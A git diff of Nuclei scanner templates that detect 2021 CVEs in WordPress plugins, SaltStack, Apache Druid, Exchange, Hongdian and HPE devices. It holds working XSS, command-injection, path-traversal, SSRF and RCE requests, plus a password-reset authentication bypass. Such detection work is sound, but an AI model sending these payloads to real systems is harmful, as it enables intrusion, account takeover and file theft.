b/nuclei-templates/CVE-2021/cve-2021-24926.yaml new file mode 100644 index 0000000000..c705851aa5 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24926.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-24926 + +info: + name: WordPress Plugin Domain Check < 1.0.17 - XSS + author: cckuailong + severity: medium + description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24926 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Domain Check" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-25033.yaml b/nuclei-templates/CVE-2021/cve-2021-25033.yaml new file mode 100644 index 0000000000..f681ba8c96 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25033.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-25033 + +info: + name: Noptin < 1.6.5 - Open Redirect + author: dhiyaneshDk + severity: medium + description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c + - https://plugins.trac.wordpress.org/changeset/2639592 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25033 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25033 + cwe-id: CWE-601 + tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,noptin + +requests: + - method: GET + path: + - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/04/13 diff --git a/nuclei-templates/CVE-2021/cve-2021-25063.yaml b/nuclei-templates/CVE-2021/cve-2021-25063.yaml new file mode 100644 index 0000000000..48a654dc21 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25063.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-25063 + +info: + name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25063 + cwe-id: CWE-79 + tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "' type='hidden" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-25085.yaml b/nuclei-templates/CVE-2021/cve-2021-25085.yaml new file mode 100644 index 0000000000..250ce81d36 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25085.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-25085 + +info: + name: WOOF WordPress plugin - Cross-Site Scripting + author: Maximus Decimus + severity: medium + description: | + The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. + reference: + - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 + - https://plugins.trac.wordpress.org/changeset/2648751 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25085 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25085 + metadata: + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"additional_fields":[""]}' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2021/cve-2021-25112.yaml b/nuclei-templates/CVE-2021/cve-2021-25112.yaml new file mode 100644 index 0000000000..1705945685 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25112.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-25112 + +info: + name: WordPress WHMCS Bridge < 6.4b - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard. + reference: + - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112 + - https://plugins.trac.wordpress.org/changeset/2659751 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25112 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/cve-2021-25281.yaml b/nuclei-templates/CVE-2021/cve-2021-25281.yaml new file mode 100644 index 0000000000..8a2c51684d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25281.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-25281 + +info: + name: SaltStack Salt <3002.5 - Auth Bypass + author: madrobot + severity: critical + description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master. + reference: + - http://hackdig.com/02/hack-283902.htm + - https://dozer.nz/posts/saltapi-vulns + - https://nvd.nist.gov/vuln/detail/CVE-2021-25281 + - https://github.com/saltstack/salt/releases + - https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-25281 + cwe-id: CWE-287 + tags: cve,cve2021,saltapi,rce,saltstack,unauth + +requests: + - raw: + - | + POST /run HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "return" + - "tag" + - "jid" + - "salt" + - "wheel" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/cve-2021-25646.yaml b/nuclei-templates/CVE-2021/cve-2021-25646.yaml new file mode 100644 index 0000000000..f5056c289a --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25646.yaml @@ -0,0 +1,84 @@ +id: CVE-2021-25646 + +info: + name: Apache Druid RCE + author: pikpikcu + severity: high + description: | + Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. + Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. + reference: + - https://paper.seebug.org/1476/ + - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E + - http://www.openwall.com/lists/oss-security/2021/01/29/6 + - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-25646 + cwe-id: CWE-732 + tags: cve,cve2021,apache,rce,druid + +requests: + - raw: + - | + POST /druid/indexer/v1/sampler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"index", + "spec":{ + "ioConfig":{ + "type":"index", + "firehose":{ + "type":"local", + "baseDir":"/etc", + "filter":"passwd" + } + }, + "dataSchema":{ + "dataSource":"odgjxrrrePz", + "parser":{ + "parseSpec":{ + "format":"javascript", + "timestampSpec":{ + + }, + "dimensionsSpec":{ + + }, + "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", + "":{ + "enabled":"true" + } + } + } + } + }, + "samplerConfig":{ + "numRows":10 + } + } + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - "numRowsRead" + - "numRowsIndexed" + part: body + condition: and + + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-26247.yaml b/nuclei-templates/CVE-2021/cve-2021-26247.yaml new file mode 100644 index 0000000000..3a51363f35 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26247.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-26247 + +info: + name: Unauthenticated XSS Cacti - auth_changepassword.php + author: dhiyaneshDK + severity: medium + description: As an unauthenticated remote user, visit "http:///auth_changepassword.php?ref=" to successfully execute the JavaScript payload present in the "ref" URL parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-26247 + - https://www.cacti.net/info/changelog + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26247 + cwe-id: CWE-79 + tags: cve,cve2021,cacti,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-26598.yaml b/nuclei-templates/CVE-2021/cve-2021-26598.yaml new file mode 100644 index 0000000000..148674a260 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26598.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-26598 + +info: + name: ImpressCMS - Incorrect Authorization + author: gy741,pdteam + severity: medium + description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). + reference: + - https://hackerone.com/reports/1081137 + - http://karmainsecurity.com/KIS-2022-03 + - https://github.com/ImpressCMS + - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-26598 + cwe-id: CWE-287 + metadata: + shodan-query: http.html:"ImpressCMS" + tags: cve,cve2021,impresscms,unauth,cms + +requests: + - raw: + - | + GET /misc.php?action=showpopups&type=friend HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + - | + GET /include/findusers.php?token={{token}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - 'last_login' + - 'user_regdate' + - 'uname' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - "REQUEST' value='(.*?)'" + - 'REQUEST" value="(.*?)"' diff --git a/nuclei-templates/CVE-2021/cve-2021-26855.yaml b/nuclei-templates/CVE-2021/cve-2021-26855.yaml new file mode 100644 index 0000000000..ae5e857ac7 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26855.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-26855 + +info: + name: Microsoft Exchange Server SSRF Vulnerability + author: madrobot + severity: critical + description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. + reference: + - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855 + - https://proxylogon.com/#timeline + - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + remediation: Apply the appropriate security update. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-26855 + tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft + +requests: + - raw: + - | + GET /owa/auth/x.js HTTP/1.1 + Host: {{Hostname}} + Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/02/04 diff --git a/nuclei-templates/CVE-2021/cve-2021-27132.yaml b/nuclei-templates/CVE-2021/cve-2021-27132.yaml deleted file mode 100644 index 7f46e618ad..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-27132.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-27132 - -info: - name: Sercomm VD625 Smart Modems - CRLF Injection - author: geeknik - severity: critical - description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header. - reference: - - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 - - http://sercomm.com - - https://nvd.nist.gov/vuln/detail/CVE-2021-27132 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-27132 - cwe-id: CWE-74 - tags: cve,cve2021,crlf,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" - - matchers-condition: and - matchers: - - type: status - status: - - 404 - part: header - - - type: word - words: - - "Content-Disposition: attachment;filename=test.txt" - - "Set-Cookie:CRLFInjection=Test" - - "Location: example.com" - - "X-XSS-Protection:0" - part: header - condition: and - -# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/cve-2021-27519.yaml b/nuclei-templates/CVE-2021/cve-2021-27519.yaml deleted file mode 100644 index 93e44aea56..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-27519.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-27519 - -info: - name: FUDForum 3.1.0 - Cross-Site Scripting - author: kh4sh3i - severity: medium - description: | - FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. - reference: - - https://www.exploit-db.com/exploits/49942 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: xss,fudforum,edb,packetstorm,cve,cve2021 - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-27561.yaml b/nuclei-templates/CVE-2021/cve-2021-27561.yaml new file mode 100644 index 0000000000..b448188200 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-27561.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-27561 + +info: + name: YeaLink DM 3.6.0.20 - Remote Command Injection + author: shifacyclewala,hackergautam + severity: critical + description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. + reference: + - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 + - https://ssd-disclosure.com/?p=4688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-27561 + cwe-id: CWE-77 + tags: cve,cve2021,rce,yealink,mirai + +requests: + - method: GET + path: + - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;" + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - 'uid' + - 'gid' + - 'groups' + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - "(u|g)id=.*" + +# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/cve-2021-28149.yaml b/nuclei-templates/CVE-2021/cve-2021-28149.yaml new file mode 100644 index 0000000000..9a8a2cc332 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-28149.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-28149 + +info: + name: Hongdian Directory Traversal + author: gy741 + severity: medium + description: | + Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 + - http://en.hongdian.com/Products/Details/H8922 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-28149 + cwe-id: CWE-22 + tags: cve,cve2021,hongdian,traversal + +requests: + - raw: + - | + GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + + - | + GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/octet-stream" + part: header + + - type: regex + regex: + - "root:.*:0:0:" + - "sshd:[x*]" + - "root:[$]" + part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-28151.yaml b/nuclei-templates/CVE-2021/cve-2021-28151.yaml new file mode 100644 index 0000000000..9a57731f21 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-28151.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-28151 + +info: + name: Hongdian Command Injection + author: gy741 + severity: high + description: | + Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 + - http://en.hongdian.com/Products/Details/H8922 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-28151 + cwe-id: CWE-78 + tags: cve,cve2021,hongdian,rce,injection + +requests: + - raw: + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Origin: {{BaseURL}} + Referer: {{BaseURL}}/tools.cgi + + op_type=ping&destination=%3Bid + + - | + POST /tools.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= + Origin: {{BaseURL}} + Referer: {{BaseURL}}/tools.cgi + + op_type=ping&destination=%3Bid + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + part: body + condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-28164.yaml b/nuclei-templates/CVE-2021/cve-2021-28164.yaml new file mode 100644 index 0000000000..be040c4bd7 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-28164.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-28164 + +info: + name: Jetty Authorization Before Parsing and Canonicalization + author: noamrathaus + severity: medium + description: | + The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. For example a request to /context/%2e/WEB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. + reference: + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 + - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty + - https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-28164 + cwe-id: CWE-200 + tags: cve,cve2021,jetty + +requests: + - method: GET + path: + - "{{BaseURL}}/%2e/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "java.sun.com" + part: body + condition: and + + - type: word + part: header + words: + - "application/xml" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-28377.yaml b/nuclei-templates/CVE-2021/cve-2021-28377.yaml deleted file mode 100644 index 03cc1bbced..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-28377.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-28377 - -info: - name: Joomla! ChronoForums 2.0.11 - Local File Inclusion - author: 0x_Akoko - severity: medium - description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-28377 - cwe-id: CWE-22 - tags: cve,cve2021,chronoforums,lfi,joomla - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2021/cve-2021-29203.yaml b/nuclei-templates/CVE-2021/cve-2021-29203.yaml new file mode 100644 index 0000000000..2189884675 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-29203.yaml @@ -0,0 +1,56 @@ +id: CVE-2021-29203 + +info: + name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass + author: madrobot + severity: critical + description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. + reference: + - https://www.tenable.com/security/research/tra-2021-15 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 + - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-29203 + cwe-id: CWE-287 + tags: hpe,cve,cve2021,bypass + +requests: + - raw: + - | + PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + + {"Password":"{{randstr}}"} + + - | + POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"UserName":"Administrator","Password":"{{randstr}}"} + + matchers-condition: and + matchers: + + - type: status + status: + - 201 + + - type: word + condition: and + part: header + words: + - "X-Auth-Token" + - "PasswordReset" + - "Location" + + - type: word + part: body + words: + - "Base.1.0.Created" + +# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/cve-2021-29442.yaml b/nuclei-templates/CVE-2021/cve-2021-29442.yaml new file mode 100644 index 0000000000..9f495334b8 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-29442.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-29442 + +info: + name: Nacos prior to 1.4.1 Missing Authentication Check + author: dwisiswant0 + severity: high + description: | + In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. + While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. + These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql) + reference: + - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + - https://github.com/alibaba/nacos/issues/4463 + - https://github.com/alibaba/nacos/pull/4517 + - https://github.com/advisories/GHSA-36hp-jr8h-556f + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 + tags: nacos,auth-bypass,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + part: header + - type: regex + regex: + - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\"" + part: body diff --git 